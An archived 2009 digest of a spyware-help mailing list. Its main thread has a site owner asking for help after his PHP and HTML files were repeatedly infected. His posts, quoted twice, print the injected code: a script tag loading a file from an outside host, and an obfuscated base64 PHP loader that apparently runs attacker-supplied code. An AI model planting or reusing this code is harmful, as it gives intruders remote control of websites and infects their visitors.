To: spyware@yahoogroups.com
Date: Saturday, October 24, 2009, 1:39 PM






�





                   Hi there,

       First I would like to thank you for your reply.

1) I've AVG software on my pc which I've purchased recently after I got

attacked.

2) I changed the passwords for all of my ftp accounts.

3) How would I check whether my php is running debug mode or not? I did

not have .htaccess in all the directories.

Could you please let me know how to setup the .htaccess file.

4) I did change all the file permission to "read" only but he changing

write.

5) How to figure out who is hacking my site in log file. I've checked my

log file but I don't see that. Could you please give me more information

about the log file.



Note: I changed my all ftp passwords and not accessing ftp accounts from

home computers, since then they did not attack.

Let see whether they are going to come back or not.



Thanks again.

Bunny.



--- In spyware@yahoogroups .com, "ercoupeflyer" <ercoupeflyer@ ...> wrote:

>

>

> 1) ensure you have a good antivirus on your personal local computer

> , and that there is no spy running on your computer before you access

you web page, be sure to always use https or secure password when

accessing the site.

>

> 2) change all your passwords at once for your web site. ensure you do

in fact have a password for your website admin.

> godaddy is very secure in preventing access to os etc, but not badly

managed pages.

>

> 3) make sure you have added the security file .htaccess to all of your

directories on your website which prevents access/writing. Make sure php

is not in debug mode..

>

> 4) make all files read only or rx

>

> 5) check the log files to see who is hacking or attempting to hack

your site and notify the service provider of the ip, ask to shut it

down,(this probably will fall on deaf ears, but at least you let someone

know!

>

> --- In spyware@yahoogroups .com, biksham no_reply@ wrote:

> >

> > Hello there,

> >     I have a website called eBlueFox.com. Since 3 weeks some body

hacking

> > my website

> > and adding some kind of virus. My website files are in php and html

> > code.

> > They are adding following code in php and html files.

> >

> > 1)If its html file then adding the following code before <body> tag

> > <script src=http://dr-mhashim. com/ContactUs/ myalbum.php ></script>.

> >

> > 2) If its php file then adding the following code before the first

line

> > of code.

> >

> > <?php

> >

eval(base64_ decode('aWYoIWlz c2V0KCRqemk5ODEp KXtmdW5jdGlvbiBq emk5OCgkcyl7\

\

> >

aWYocHJlZ19tYXRjaF9 hbGwoJyM8c2NyaXB 0KC4qPyk8L3Njcml wdD4jaXMnLCRzLCR hKSlm\

\

> >

b3JlYWNoKCRhWzBdIGF zICR2KWlmKGNvdW5 0KGV4cGxvZGUoIlx uIiwkdikpPjUpeyR lPXBy\

\

> >

ZWdfbWF0Y2goJyNbXCc iXVteXHNcJyJcLiw 7XD8hXFtcXTovPD5 cKFwpXXszMCx9Iyc sJHYp\

\

> >

fHxwcmVnX21hdGNoKCc jW1woXFtdKFxzKlx kKywpezIwLH0jJyw kdik7aWYoKHByZWd fbWF0\

\

> >

Y2goJyNcYmV2YWxcYiM nLCR2KSYmKCRlfHx zdHJwb3MoJHYsJ2Z yb21DaGFyQ29kZSc pKSl8\

\

> >

fCgkZSYmc3RycG9zKCR 2LCdkb2N1bWVudC5 3cml0ZScpKSkkcz1 zdHJfcmVwbGFjZSg kdiwn\

\

> >

Jywkcyk7fWlmKHByZWd fbWF0Y2hfYWxsKCc jPGlmcmFtZSAoW14 +XSo/KXNyYz1bXCc iXT8o\

\

> >

aHR0cDopPy8vKFtePl0 qPyk+I2lzJywkcyw kYSkpZm9yZWFjaCg kYVswXSBhcyAkdil pZihw\

\

> >

cmVnX21hdGNoKCcjIHd pZHRoXHMqPVxzKlt cJyJdPzAqWzAxXVt cJyI+IF18ZGlzcGx heVxz\

\

> >

Kjpccypub25lI2knLCR 2KSYmIXN0cnN0cig kdiwnPycuJz4nKSk kcz1wcmVnX3JlcGx hY2Uo\

\

> >

JyMnLnByZWdfcXVvdGU oJHYsJyMnKS4nLio /PC9pZnJhbWU+ I2lzJywnJywkcyk7 JHM9c3Ry\

\

> >

X3JlcGxhY2UoJGE9YmF zZTY0X2RlY29kZSg nUEhOamNtbHdkQ0J 6Y21NOWFIUjBjRG9 2TDJS\

\

> >

eUxXMW9ZWE5vYVcwdVk yOXRMME52Ym5SaFk zUlZjeTl0ZVdGc1l uVnRMbkJvY0NBK1B DOXpZ\

\

> >

M0pwY0hRKycpLCcnLCR zKTtpZihzdHJpc3R yKCRzLCc8Ym9keSc pKSRzPXByZWdfcmV wbGFj\

\

> >

ZSgnIyhccyo8Ym9keSk jbWknLCRhLidcMSc sJHMpO2Vsc2VpZih zdHJwb3MoJHMsJyx hJykp\

\

> >

JHMuPSRhO3JldHVybiA kczt9ZnVuY3Rpb24 ganppOTgyKCRhLCR iLCRjLCRkKXtnbG9 iYWwg\

\

> >

JGp6aTk4MTskcz1hcnJ heSgpO2lmKGZ1bmN 0aW9uX2V4aXN0cyg kanppOTgxKSljYWx sX3Vz\

\

> >

ZXJfZnVuYygkanppOTg xLCRhLCRiLCRjLCR kKTtmb3JlYWNoKEB vYl9nZXRfc3RhdHV zKDEp\

\

> >

IGFzICR2KWlmKCgkYT0 kdlsnbmFtZSddKT0 9J2p6aTk4JylyZXR 1cm47ZWxzZWlmKCR hPT0n\

\

> >

b2JfZ3poYW5kbGVyJyl icmVhaztlbHNlICR zW109YXJyYXkoJGE 9PSdkZWZhdWx0IG9 1dHB1\

\

> >

dCBoYW5kbGVyJz9mYWx zZTokYSk7Zm9yKCR pPWNvdW50KCRzKS0 xOyRpPj0wOyRpLS0 peyRz\

\

> >

WyRpXVsxXT1vYl9nZXR fY29udGVudHMoKTt vYl9lbmRfY2xlYW4 oKTt9b2Jfc3RhcnQ oJ2p6\

\

> >

aTk4Jyk7Zm9yKCRpPTA 7JGk8Y291bnQoJHM pOyRpKyspe29iX3N 0YXJ0KCRzWyRpXVs wXSk7\

\

> >

ZWNobyAkc1skaV1bMV0 7fX19JGp6aTk4bD0 oKCRhPUBzZXRfZXJ yb3JfaGFuZGxlcig nanpp\

\

> >

OTgyJykpIT0nanppOTg yJyk/JGE6MDtldmF sKGJhc2U2NF9kZWN vZGUoJF9QT1NUWyd lJ10p\

\

> > KTs=')); ?>

> >

> > 3) Before they were adding "<iframe" some etc... code before the

body

> > and end of the file. But they changed the stretagy. I'm

> > keep on cleaning and So far I did 5 times.

> > 4) I've talked to the hosting company (godaddy.com) support group.

They

> > said their servers are very

> > secured and there is some thing I need to control. I don't

understand

> > what should I do. Its driving me crazy.

> > 5) Some body suggested me to change the file permission to read

only. I

> > did that one too. But no luck, next day

> > he is changing the file permission to "read,write, and execte" and

added

> > spam.

> >   Please..please. . helm me to stop the spam.

> >

> >   Thank you and I would appreciate for your help.

> >

> >   Reg

> >   Bunny.

> >

> >

> >

> >

> >

> > [Non-text portions of this message have been removed]

> >

>































[Non-text portions of this message have been removed]

Try this: Using an uninfected computer, go here: http://www.ubcd4win.com/
Download The Ultimate Boot CD for Windows, Burn it to disk, Boot from CD on
your infected PC and use the utilities on the boot CD to remove the
offending program. Once you have booted your infected PC the program will be
loaded into memory and will not allow you to remove it. The UBCD4Win
bypasses this.

--- In spyware@yahoogroups.com <mailto:spyware%40yahoogroups.com> ,
"queastellyeah" <queastellyeah@...> wrote:
>
> Hello everyone. I think that this group may be an answer to my prayers. I
have this thing called "Alpha Antivirus" and it makes me want to hurt
people..... lol. It keeps giving me pop ups, and my only option is to buy.
Well I don't want to buy it, and im not going to. I spent six hundred bucks
on this laptop which ran great, and this thing cut its speed in half. The
thing is that I cant delete it at all, so I went online and looked it up,
only to find out that its some kind of spy wear. The site that I went to
offered what they called the the cure all, however, the thing would never
download because the file was corrupt or something. I joined this group that
I may learn how to get rid of this thing and prevent future cases. I would
be VERY greatfull to anyone who might tell me how to rid my system of this
nonsense, and what I need to do to keep it fast like it was. I thank you all
so very much.
>
> By the way...
> Inspiron 1501 laptop
> running Vista Home Basic
>
> Your friend Queastellyeah,
>





[Non-text portions of this message have been removed]

If you use GMail, you might want to follow Google's GMail Blog which gives
useful security tips and highlights upcoming programs still in development at
Google Labs. Google tends to fly fast and free with new program debuts, so
novice and intermediate users should be careful to stay away from BETA programs
on their primary systems.  ~A:)

Gmail account security tips
Tuesday, October 27, 2009 1:24 PM
Posted by Sarah Price, Online Operations Strategist

As part of National Cyber Security Awareness Month, we recently posted about how
to pick a smart password. Having a strong password goes a long way in helping to
protect your data, but there are a number of additional steps you can take to
help you keep your Gmail account secure:

1. Remember to sign out. Especially when using a public computer, be careful to
sign out of your Google account when you're finished. Just click the "Sign out"
link at the top right corner of your inbox. If you're using a public or shared
computer and want to be extra thorough, you can also clear the browser's cache,
cookies and history. Then, completely close the browser. On your personal
computer, you can also lock your computer with a password-protected screensaver
if you need to step away momentarily. Learn the best ways to lock your screen in
Windows or in Mac OS X. Forgot to sign out? Open up a new Gmail session on
another computer and use Gmail's remote sign out feature to close any sessions
that might still be open elsewhere.

2. Be careful about sending certain sensitive information via email. Once you
send an email, you're no longer in control of the information it contains. The
recipients, if they so choose, could forward the email or post its contents in a
public place. Even if you know and trust the people you're emailing, that
information may become exposed if their accounts become compromised or they get
a virus on their machines. As a rule of thumb, should you need to provide a
credit card number or financial account number to respond to a message, provide
it over the phone or in person �" not over email. And never share your password
with anyone. Google does not email you to ask you for your password, your social
security number, or other personal information �" so don't send it!

3. Enable "Always use HTTPS." Any time you visit a webpage, your computer needs
to send and receive information across the Internet. HTTPS is used to encrypt
data as it is transmitted between computers on the Internet, so look for the
"https" in the URL bar of your browser to indicate that the connection between
your computer and Gmail's servers is encrypted. We use HTTPS on the Gmail login
page, and you can choose to protect your entire Gmail session with HTTPS as
well. HTTPS can make your mail slower, so we let you make the choice for
yourself. Open Settings and choose "Always use HTTPS" on the General tab if you
want to turn it on.

4. Be wary of unexpected attachments.To help protect you from viruses and
malware, Gmail automatically scans every attachment when it's delivered to you,
and again each time you open a message. Attachments you send are also scanned.
That said, no system is foolproof, so if you happen to get an email from a
friend with an attachment you didn't expect, don't be afraid to ask the sender
what it is before you decide whether to open it.

5. Make sure your account recovery information is up-to-date. Your account
recovery information helps you regain access to your account if you ever forget
your password, or if someone gains access to your account without your
permission. We currently offer several paths to account recovery. Every Gmail
user must select a security question and answer �" be sure to choose a
combination that is easy for you to remember, but hard for others to guess or
come across by investigating. Don't choose a question like "What is my favorite
color?" as others may easily guess the answer. We also encourage you to provide
a secondary email address and/or a mobile phone number, so we can send you a
link to reset your password if you lose access to your account.

You can find additional security tips for Gmail in our Help Center. Learn more
about protecting your computer, website, and personal information by checking
out our security series on the Google blog or visiting
http://www.staysafeonline.org.

Permalink Links to this post

Labels: Google Apps Blog, tip

To all Spyware Mailing List members -

This is a monthly informational message to all members that provides basic
information about the mailing list.

Purpose of this Mailing List
----------------------------
This group is a PC and Internet Security Mailing list dedicated to providing
news and updated tools against spyware, adware, malware, virus, trojans, worms,
spam and other computer pests... by both removing and preventing them, on any
platform ( Windows, MacOS, Linux, etc. ). We welcome new members! This group is
moderated.


Posting Messages
----------------
Any member can post a message to the list by sending email to
spyware@yahoogroups.com. The following rules apply to posted messages:

a) BE KIND - Harassing other members, web team, moderators, the administration,
being rude, posting multiple messages with nonsense, running promotional ads
and/or spamming will just get you banned. No name calling, no vulgar language,
no promotion or links to offtopic sites.

b) NO SPAMMING! NO OFFTOPIC! NO WAREZ! NO TROLLING! - Do not use this mailing
list to promote pyramid schemes and other commercial sites. This includes
position openings by headhunters and recruiters. Also no discussion of illegal
activities such as software piracy and other intellectual property violations
will be allowed at all.

c) THINK BEFORE YOU POST - Unlike other mailing lists we do not entertain random
blobs of scribbles and nonsense, be constructive in what you have to say. Do not
post the same message on multiple threads, this is a form of spamming. Do not
hold at ransom other members that don't share your opinion.

d) NO NEGATIVITY, RACIAL OR POLITICAL STANCES - We believe that everyone is
entitled to their own point of view, but this does not mean that you have to
become negative, rude, distasteful, etc. Adding to this mailing list your
Anti-Microsoft, Anti-Apple, or Anti-Linux sentiment is NOT TOLERATED in the
LEAST! We are not saying you have to believe in what anyone says, but you do
need to respect their view(s). It is okay to be disagreeable so long as it is
done in a polite way.

e) BE ACTIVE - What is the point of joining a community to say nothing? Please
reply and contribute to the conversations. :)

f) EMAILS FROM US - We may send you newsletters about updates to this mailing
list. If you don't wish to receive emails from us, please edit your membership
by choosing how do you want messages do be delivered. There are 4 options:
'Individual emails' (sends individual email messages), 'Daily digest' (sends
many emails in one message), 'Special notices' (only sends important update
emails from the group moderators) and 'No email' (will not send emails, you'll
need to read the messages at the Web site).

g) NO PATCH, NO FLAWS - We moderators believe any security flaws should only be
posted when a solution/patch as been already released.

h) NO ATTACHMENTS - Attachments to messages are automatically removed.


Replying to Messages
--------------------
The mailing list has been set up so that replies to messages are sent to the
entire list. If you wish to reply only to the poster, be sure that you send only
private mail to that person.

Before sending a reply to everyone in the mailing list, ask yourself, "is my
response of interest only to the person to whom I am replying, or is my response
of general interest?"


Changing Email Options
----------------------
The following options are available:

* Individual E-mails. Every posting will arrive in your inbox as a separate
message.
* Daily digest. You will receive one e-mail message per day with all of the
day's postings.
* Special Notices. You will receive only administrative messages sent from the
mailing list owner.
* No Email. Select this option if you need to temporarily stop receiving email
messages. You can still view messages by going to the group's website at
http://groups.yahoo.com/group/spyware

To edit your e-mail options, go to http://groups.yahoo.com/group/spyware , join
and select the desired option in the Message Delivery section. Then, press Save
Changes button.


Joining the Mailing List
------------------------

Any person can become a member by performing any of the following:

A. joining directly at http://groups.yahoo.com/group/spyware
B. sending e-mail to spyware-subscribe@yahoogroups.com
C. accepting an invitation e-mail

An invitation e-mail can be sent by any current member of the mailing list. The
invitation is sent by clicking the "invite" link found on home page (
http://groups.yahoo.com/group/spyware ).

All memberships are approved automatically. A copy of the mailing list rules is
sent to each new member.


Leaving the Mailing List
------------------------
Any member may remove him/herself from the mailing list by sending e-mail to
spyware-unsubscribe@yahoogroups.com


Contacts
--------
Any mailing list member may send e-mail directly to the mailing list owner by
sending to spyware-owner@yahoogroups.com


Thank you for your time.

- the admin

I will try your suggestions. Thank you Brian for your help.
Biksham.


--- In spyware@yahoogroups.com, b <ercoupeflyer@...> wrote:
>
> .htaccess is documented on the apache web site documentation, It will give you
all the information you need.
>
> php is in debug mode when a flag is set in the php config file, if you dont
have access to it, you dont have to worry, but check your directories for
something like php5.conf etc..
>
> make sure debug level logging is turned on for you web server then review the
access log, looking for ip address at the time of the change, then you do a
lookup to see where it is comming from, you can do two things, direct that
address in your website using .htaccess to the FBI/NSA/DARPA� web site, or some
tracking website... it's fun to get even and may scare him to stop.
>
> I suspect from your comment that your home computer was hacked or you accessed
your web site admin from a public computer and they got your password from that!
>
> Sorry to take to long getting back to you
>
> Brian
>
> --- On Sat, 10/24/09, biksham <no_reply@yahoogroups.com> wrote:
>
> From: biksham <no_reply@yahoogroups.com>
> Subject: [spyware] Re: My website is hacked by some body, please help me.
> To: spyware@yahoogroups.com
> Date: Saturday, October 24, 2009, 1:39 PM
>
>
>
>
>
>
> �
>
>
>
>
>
>                   Hi there,
>
>       First I would like to thank you for your reply.
>
> 1) I've AVG software on my pc which I've purchased recently after I got
>
> attacked.
>
> 2) I changed the passwords for all of my ftp accounts.
>
> 3) How would I check whether my php is running debug mode or not? I did
>
> not have .htaccess in all the directories.
>
> Could you please let me know how to setup the .htaccess file.
>
> 4) I did change all the file permission to "read" only but he changing
>
> write.
>
> 5) How to figure out who is hacking my site in log file. I've checked my
>
> log file but I don't see that. Could you please give me more information
>
> about the log file.
>
>
>
> Note: I changed my all ftp passwords and not accessing ftp accounts from
>
> home computers, since then they did not attack.
>
> Let see whether they are going to come back or not.
>
>
>
> Thanks again.
>
> Bunny.
>
>
>
> --- In spyware@yahoogroups .com, "ercoupeflyer" <ercoupeflyer@ ...> wrote:
>
> >
>
> >
>
> > 1) ensure you have a good antivirus on your personal local computer
>
> > , and that there is no spy running on your computer before you access
>
> you web page, be sure to always use https or secure password when
>
> accessing the site.
>
> >
>
> > 2) change all your passwords at once for your web site. ensure you do
>
> in fact have a password for your website admin.
>
> > godaddy is very secure in preventing access to os etc, but not badly
>
> managed pages.
>
> >
>
> > 3) make sure you have added the security file .htaccess to all of your
>
> directories on your website which prevents access/writing. Make sure php
>
> is not in debug mode..
>
> >
>
> > 4) make all files read only or rx
>
> >
>
> > 5) check the log files to see who is hacking or attempting to hack
>
> your site and notify the service provider of the ip, ask to shut it
>
> down,(this probably will fall on deaf ears, but at least you let someone
>
> know!
>
> >
>
> > --- In spyware@yahoogroups .com, biksham no_reply@ wrote:
>
> > >
>
> > > Hello there,
>
> > >     I have a website called eBlueFox.com. Since 3 weeks some body
>
> hacking
>
> > > my website
>
> > > and adding some kind of virus. My website files are in php and html
>
> > > code.
>
> > > They are adding following code in php and html files.
>
> > >
>
> > > 1)If its html file then adding the following code before <body> tag
>
> > > <script src=http://dr-mhashim. com/ContactUs/ myalbum.php ></script>.
>
> > >
>
> > > 2) If its php file then adding the following code before the first
>
> line
>
> > > of code.
>
> > >
>
> > > <?php
>
> > >
>
> eval(base64_ decode('aWYoIWlz c2V0KCRqemk5ODEp KXtmdW5jdGlvbiBq emk5OCgkcyl7\
>
> \
>
> > >
>
> aWYocHJlZ19tYXRjaF9 hbGwoJyM8c2NyaXB 0KC4qPyk8L3Njcml wdD4jaXMnLCRzLCR hKSlm\
>
> \
>
> > >
>
> b3JlYWNoKCRhWzBdIGF zICR2KWlmKGNvdW5 0KGV4cGxvZGUoIlx uIiwkdikpPjUpeyR lPXBy\
>
> \
>
> > >
>
> ZWdfbWF0Y2goJyNbXCc iXVteXHNcJyJcLiw 7XD8hXFtcXTovPD5 cKFwpXXszMCx9Iyc sJHYp\
>
> \
>
> > >
>
> fHxwcmVnX21hdGNoKCc jW1woXFtdKFxzKlx kKywpezIwLH0jJyw kdik7aWYoKHByZWd fbWF0\
>
> \
>
> > >
>
> Y2goJyNcYmV2YWxcYiM nLCR2KSYmKCRlfHx zdHJwb3MoJHYsJ2Z yb21DaGFyQ29kZSc pKSl8\
>
> \
>
> > >
>
> fCgkZSYmc3RycG9zKCR 2LCdkb2N1bWVudC5 3cml0ZScpKSkkcz1 zdHJfcmVwbGFjZSg kdiwn\
>
> \
>
> > >
>
> Jywkcyk7fWlmKHByZWd fbWF0Y2hfYWxsKCc jPGlmcmFtZSAoW14 +XSo/KXNyYz1bXCc iXT8o\
>
> \
>
> > >
>
> aHR0cDopPy8vKFtePl0 qPyk+I2lzJywkcyw kYSkpZm9yZWFjaCg kYVswXSBhcyAkdil pZihw\
>
> \
>
> > >
>
> cmVnX21hdGNoKCcjIHd pZHRoXHMqPVxzKlt cJyJdPzAqWzAxXVt cJyI+IF18ZGlzcGx heVxz\
>
> \
>
> > >
>
> Kjpccypub25lI2knLCR 2KSYmIXN0cnN0cig kdiwnPycuJz4nKSk kcz1wcmVnX3JlcGx hY2Uo\
>
> \
>
> > >
>
> JyMnLnByZWdfcXVvdGU oJHYsJyMnKS4nLio /PC9pZnJhbWU+ I2lzJywnJywkcyk7 JHM9c3Ry\
>
> \
>
> > >
>
> X3JlcGxhY2UoJGE9YmF zZTY0X2RlY29kZSg nUEhOamNtbHdkQ0J 6Y21NOWFIUjBjRG9 2TDJS\
>
> \
>
> > >
>
> eUxXMW9ZWE5vYVcwdVk yOXRMME52Ym5SaFk zUlZjeTl0ZVdGc1l uVnRMbkJvY0NBK1B DOXpZ\
>
> \
>
> > >
>
> M0pwY0hRKycpLCcnLCR zKTtpZihzdHJpc3R yKCRzLCc8Ym9keSc pKSRzPXByZWdfcmV wbGFj\
>
> \
>
> > >
>
> ZSgnIyhccyo8Ym9keSk jbWknLCRhLidcMSc sJHMpO2Vsc2VpZih zdHJwb3MoJHMsJyx hJykp\
>
> \
>
> > >
>
> JHMuPSRhO3JldHVybiA kczt9ZnVuY3Rpb24 ganppOTgyKCRhLCR iLCRjLCRkKXtnbG9 iYWwg\
>
> \
>
> > >
>
> JGp6aTk4MTskcz1hcnJ heSgpO2lmKGZ1bmN 0aW9uX2V4aXN0cyg kanppOTgxKSljYWx sX3Vz\
>
> \
>
> > >
>
> ZXJfZnVuYygkanppOTg xLCRhLCRiLCRjLCR kKTtmb3JlYWNoKEB vYl9nZXRfc3RhdHV zKDEp\
>
> \
>
> > >
>
> IGFzICR2KWlmKCgkYT0 kdlsnbmFtZSddKT0 9J2p6aTk4JylyZXR 1cm47ZWxzZWlmKCR hPT0n\
>
> \
>
> > >
>
> b2JfZ3poYW5kbGVyJyl icmVhaztlbHNlICR zW109YXJyYXkoJGE 9PSdkZWZhdWx0IG9 1dHB1\
>
> \
>
> > >
>
> dCBoYW5kbGVyJz9mYWx zZTokYSk7Zm9yKCR pPWNvdW50KCRzKS0 xOyRpPj0wOyRpLS0 peyRz\
>
> \
>
> > >
>
> WyRpXVsxXT1vYl9nZXR fY29udGVudHMoKTt vYl9lbmRfY2xlYW4 oKTt9b2Jfc3RhcnQ oJ2p6\
>
> \
>
> > >
>
> aTk4Jyk7Zm9yKCRpPTA 7JGk8Y291bnQoJHM pOyRpKyspe29iX3N 0YXJ0KCRzWyRpXVs wXSk7\
>
> \
>
> > >
>
> ZWNobyAkc1skaV1bMV0 7fX19JGp6aTk4bD0 oKCRhPUBzZXRfZXJ yb3JfaGFuZGxlcig nanpp\
>
> \
>
> > >
>
> OTgyJykpIT0nanppOTg yJyk/JGE6MDtldmF sKGJhc2U2NF9kZWN vZGUoJF9QT1NUWyd lJ10p\
>
> \
>
> > > KTs=')); ?>
>
> > >
>
> > > 3) Before they were adding "<iframe" some etc... code before the
>
> body
>
> > > and end of the file. But they changed the stretagy. I'm
>
> > > keep on cleaning and So far I did 5 times.
>
> > > 4) I've talked to the hosting company (godaddy.com) support group.
>
> They
>
> > > said their servers are very
>
> > > secured and there is some thing I need to control. I don't
>
> understand
>
> > > what should I do. Its driving me crazy.
>
> > > 5) Some body suggested me to change the file permission to read
>
> only. I
>
> > > did that one too. But no luck, next day
>
> > > he is changing the file permission to "read,write, and execte" and
>
> added
>
> > > spam.
>
> > >   Please..please. . helm me to stop the spam.
>
> > >
>
> > >   Thank you and I would appreciate for your help.
>
> > >
>
> > >   Reg
>
> > >   Bunny.
>
> > >
>
> > >
>
> > >
>
> > >
>
> > >
>
> > > [Non-text portions of this message have been removed]
>
> > >
>
> >
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [Non-text portions of this message have been removed]
>

Hello there. I am new to the Group, my name is Samantha living northern suburbs
of Brisbane.�
�
Just a query if I may?� The past couple of weeks I have had my Hotmail contact
list compromised, I think the term is Phished, but Spammed could be the term
too, I am unsure. It happens this way.
�
An email comes in from an old�aquaintence of whom has deleted me from his or her
MSN Messenger or Hotmail account.��Then more�past aquaintences who used to be in
my contacts list, but I deleted over the years, are in touch with me, people
whom I have not had�anything to do with for years. The email heading is "Hello
D:" or MSN Blocker. It is all about who has deleted me from their contact list.
This programe has unearthed some old contacts. Actually one point I will make
is, one contact has passed away, and yet his�email address has been pulled up.�
I can copy and paste the email if anyone would like to shed some light on this.�
�
I have run scans such as Malawarebytes, Windows Defender, AVG, all show I have
no virus. But does this mean I do not have a worm?�� I have been in�touch with
MSN and they in turn have referred me to a link to help me with this, but the
link does not open. Something about the web page cannot display the page.� From
what I am led to believe this problem started from MSN Windows�Live.
�
I am not alone in this.� I have read complaints from all over the world in MSN
posts and groups. But no one has come up with an answer to to be rid of this
parasite.
�
Has anyone on here had the same trouble?
�
I will await your response,
�
Thanks,
�
Samantha




      
________________________________________________________________________________\
__
Get more done like never before with Yahoo!7 Mail.
Learn more: http://au.overview.mail.yahoo.com/

[Non-text portions of this message have been removed]

Hi Samantha, and Thanks for Joining Spyware!

Your problem is unclear, although we can take some guesses from your comments.

First, It sounds like you can rest easy that you have probably not contracted
Malware of any sort; it sounds more like a Spam issue ~~ or, and please do not
take offense ~~ an issue understanding Microsoft's ever~changing Hotmail
protocols regarding MSN Messenger and Hotmail Buddy Lists. Not to worry ~ no one
understands them, which is why so few people who have a choice use those two
programs anymore.

I'd make certain I'm not using Microsoft's web browser, Internet Explorer,
although it must be used for Windows Updates etc and certain, extremely few web
sites / pages around the internet. This Group does not approve of IE for a
number of reasons, but a single component of IE called ActiveX has created the
lion's share of Spyware, historically.

We formally support Mozilla's web browser, Firefox (www.firefox.com).
Informally, Opera (www.opera.com) and Google's Chrome (www.google.com/chrome)
are superb as well. Firefox is the most user~friendly, so I might recommend it
to start.

Second, with your Firefox browser, please go to mail.google.com and establish a
Google GMail account.

Third, copy from your Hotmail (and whatever other) account(s) a completely
up~to~date list of people with whom you'd like to correspond. From your new
GMail account, send a circular memo to all of those people that you've changed
your Hotmail email account over to Google's GMail and to please cancel your old
Hotmail address and replace it with your new GMail address.

Then, you'll discover the benefits of the Firefox browser and the GMail account.
One that I suspect you may like is that GMail's Spam catcher is ruthless,
compared to Hotmail or Yahoo Mail ~ but you must help GMail to help you by using
a more secure browser such as Firefox.

Happy Computing!
~Amy:)

Spyware@yahoogroups.com, Samantha MacDonald <samanthaaust@...> wrote:
>
> Hello there. I am new to the Group, my name is Samantha living northern
suburbs of Brisbane.�
> �
> Just a query if I may?� The past couple of weeks I have had my Hotmail
contact list compromised, I think the term is Phished, but Spammed could be the
term too, I am unsure. It happens this way.
> �
> An email comes in from an old�aquaintence of whom has deleted me from his or
her MSN Messenger or Hotmail account.��Then more�past aquaintences who
used to be in my contacts list, but I deleted over the years, are in touch with
me, people whom I have not had�anything to do with for years. The email
heading is "Hello D:" or MSN Blocker. It is all about who has deleted me from
their contact list. This programe has unearthed some old contacts. Actually one
point I will make is, one contact has passed away, and yet his�email address
has been pulled up.� I can copy and paste the email if anyone would like to
shed some light on this.�
> �
> I have run scans such as Malawarebytes, Windows Defender, AVG, all show I have
no virus. But does this mean I do not have a worm?�� I have been in�touch
with MSN and they in turn have referred me to a link to help me with this, but
the link does not open. Something about the web page cannot display the page.�
From what I am led to believe this problem started from MSN Windows�Live.
> �
> I am not alone in this.� I have read complaints from all over the world in
MSN posts and groups. But no one has come up with an answer to to be rid of this
parasite.
> �
> Has anyone on here had the same trouble?
> �
> I will await your response,
> �
> Thanks,
> �
> Samantha
>
>
>
>
>      
________________________________________________________________________________\
__
> Get more done like never before with Yahoo!7 Mail.
> Learn more: http://au.overview.mail.yahoo.com/
>
> [Non-text portions of this message have been removed]
>

Using Cloud Computing To Crack Passwords �" Amazon’s EC2
Darknet spilled these bits on November 3rd 2009 @ 10:07 am

Now this is interesting a proper mathematical calculation for using cloud
computing to crack passwords, now Amazon has opened up their EC2 (Elastic
Compute Cloud) the cost of massive parallel processing power has come right
down.

And guess what, someone thought of using it to crack passwords. It seems the
cut-off would be a 12 character password as even with all lower case characters
it would cost USD1.5 million to crack.

It gets exponentially cheaper as you remove each character (due to the
calculation using the power of the number of characters) so a 10 character
password would only cost you just over USD2000!

     Forget what you’ve learned about password security. A simple pass code
with nothing more than lower-case letters may be all you need �" provided you
use 12 characters.

     That’s the conclusion of security consultant David Campbell, who
calculated the cost of waging a brute-force attack on various types of passwords
using cloud computing services offered by Amazon.

     Based on hourly fees Amazon charges for its EC2 web service, it would cost
more than $1.5m to brute force a 12-character password containing nothing more
than lower-case letters a through z. But user beware, an 11-character code costs
less than $60,000 to crack, and a 10-letter phrase costs less than $2,300.

     Adding upper-case letters and numbers to a password offers some additional
security, but not as much as you might think. Such a phrase using 10 characters
would cost less than $60,000 to attack, while an 11-character code would cost
roughly $2.1m. Even passwords that contain an additional 32 characters such as
!@#$% are relatively cheap to crack if they are short enough. An eight-character
password would cost a little more than $106,000.

I’d say adding upper case letters and numbers makes quite a difference, a 10
character passwords jumps from just over USD2000 to crack all the way up to
USD60,000. That’s a factor of 30!

I’d say a 10 character password containing uppercase, lowercase, numbers and
specials characters should be well into the millions and keep you fairly safe.

I did write some guidelines and tips on creating a secure password a while back,
you can check it out here �" Good Password Guidelines �" How to Make a
Strong/Secure Password.

     The analysis, which Campbell posted here, builds off of research fellow
security consultant Haroon Meer of SensePost presented earlier this year at the
Black Hat conference. In it, he showed how EC2 could provide criminals using
stolen credit cards with the equivalent of a super computer to crack encryption
keys and passwords.

     And that, in turn, will require new ways of thinking on the part of white
hats.

     “As it becomes possible now for the black hat community to get their hands
on large amounts of computing power, we as security professionals are going to
need to reassess threat models that we thought previously were not a factor,”
said Campbell. “Using stolen credit cards, they could create a super computer
that would be faster potentially than what the three-letter agencies have and
they wouldn’t be paying for the CPU cycles.”

     Although Amazon takes pains to ration resources it makes available to single
customers, Meer showed it was possible to get around such limitations using a
single credit card. Presumably, it would be even easier to bypass those controls
using hundreds or thousands of stolen credit cards, something that is trivial
for criminals to get a hold of. Campbell’s assumptions are based on simple
arithmetic.

It’s interesting research nevertheless, I’d say Cloud Computing is only
going to get more powerful and cheaper to rent so character based passwords may
become completely defunct at some point in the future.

The computing power is not at the point where you have to worry about your 1024
bit RSA encryption quite yet, but it may well be in the near future as it’s
already advised to use a 2048 bit key length!

Combining this platform with the abundance of stolen credit card details the
blackhats have could be quite devastating.

Source: The Register

Anyone know what 'DRPU PC Data Management' is what it does and how it could have
got onto a friends computer? I tried to search for information on it and can
only find links to download it and I don't want to do this.
I've been told that it can't be picked up from the net, could the user have
somehow mistakenly downloaded and installed it without realizing it was a
keylogger?
The user is trying to blame a technician for installing it.
Any help would be greatly appreciated.

amy.licious  wrote:
We formally support Mozilla's web browser, Firefox (www.firefox.com).
Informally, Opera (www.opera.com)
and Google's Chrome (www.google. com/chrome) are superb as well.
Firefox is the most user~friendly, so I might recommend it to start.
----------

Amy,

Great recommendation. I'm a big fan of Firefox as well.

The one criticism of it seems to be its system resource usage, which can be a
bit on the heavy side compared with IE. I know there are some ways to tweak
Firefoxso it's a bit less of a hog, but it's challenging finding a good web
source offering simple guidelines for this. Are there any you would recommend?

Thanks and regards,


Steven Plisk
Management Systems Associates LLC • Shelton CT
www.management-sa.com• pcsecurity.boomja.com
Business Software Solutions Since 1981

[Non-text portions of this message have been removed]

Thank you Amy so much for your help.  I have just opened a GMail account and
now I will Export all of my Hotmail contacts to it.  Having been ten years
with the same hotmail account a change is well overdue.  I have not been happy
